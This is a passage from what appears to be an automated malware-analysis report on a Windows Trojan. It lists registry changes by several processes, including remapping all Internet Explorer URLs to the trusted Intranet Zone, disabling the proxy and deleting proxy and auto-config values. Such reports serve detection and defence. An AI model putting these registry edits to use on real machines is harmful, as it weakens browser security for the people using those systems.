"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"DisplayName" = "´óÌìʹ֮½£"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 99 50 CC B8 CB D3 3C 05 16 D9 31 F4 52 6C 41"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The process MM-liao8398.exe:824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014122020141221\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv083_98.exe" = "9158chat2_ktv083_98"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao8398.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheRepair" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1413899698"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 E8 6B FF E9 5E C7 46 CA A3 F0 95 F2 A6 F6 F2"

[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CachePrefix" = ":2014122020141221:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041720130418]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 61 03 27 91 D4 87 08 8F D0 65 E9 A4 53 D3 B0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process notify.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\PPTAssist\Common\minisite]
"Address" = "ZmlsZTovLy8lYXBwcm9vdCVcbWluaXNpdGVcMS4wXGluZGV4Lmh0bWw="

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\PPTAssist\Common\minisite]
"timebucket" = "11:40:00-14:00:00,17:20:00-20:00:00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\PPTAssist\Common\updateinfo]
"notifysettingetag" = "7139DDC4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\PPTAssist\Common\minisite]
"idleContinueSecond" = "240"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\PPTAssist\Common\minisite]
"switch" = "3"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\PPTAssist\Common\updateinfo]
"LastNotifyTime" = "2014-12-20 02:06:01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 8F 8B DD D8 B7 00 AD B7 AF B7 4D ED 37 0F 60"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\PPTAssist\Common\updateinfo]
"LastKsoActive" = "2014-12-20 02:06:14"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 9158chat2_ktv083_98.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"

[HKLM\SOFTWARE\9158web]
"StartTime" = "12200205"

[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\9158Service]
"LastPlat" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓƵ]
"DisplayVersion" = "6.800"
"DisplayName" = "9158¶àÈËÊÓƵ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158¶àÈËÊÓƵ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 39 3E D3 F3 BC 60 64 40 BE D6 DD 2F FF EA 08"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓƵ]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "Ìì¸ñ¿Æ¼¼£¨º¼ÖÝ£©ÓÐÏÞ¹«Ë¾"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓƵ]
"URLInfoAbout" = "http://www.9158.com/"

The process assistupdate.exe:2080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 E4 04 70 F5 F4 A5 52 A4 52 43 B8 76 1E A2 1E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process dts.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 D1 B0 B4 A5 07 55 FF 8A 3C B5 8F 6B E8 79 72"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process dts.exe:1728 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 27 A4 56 D5 0B BD EF 0C 01 85 38 9E 40 7D 22"

The process dts.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 84 70 76 50 17 53 A0 4E 4A 95 5F FB 3C 7D 36"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
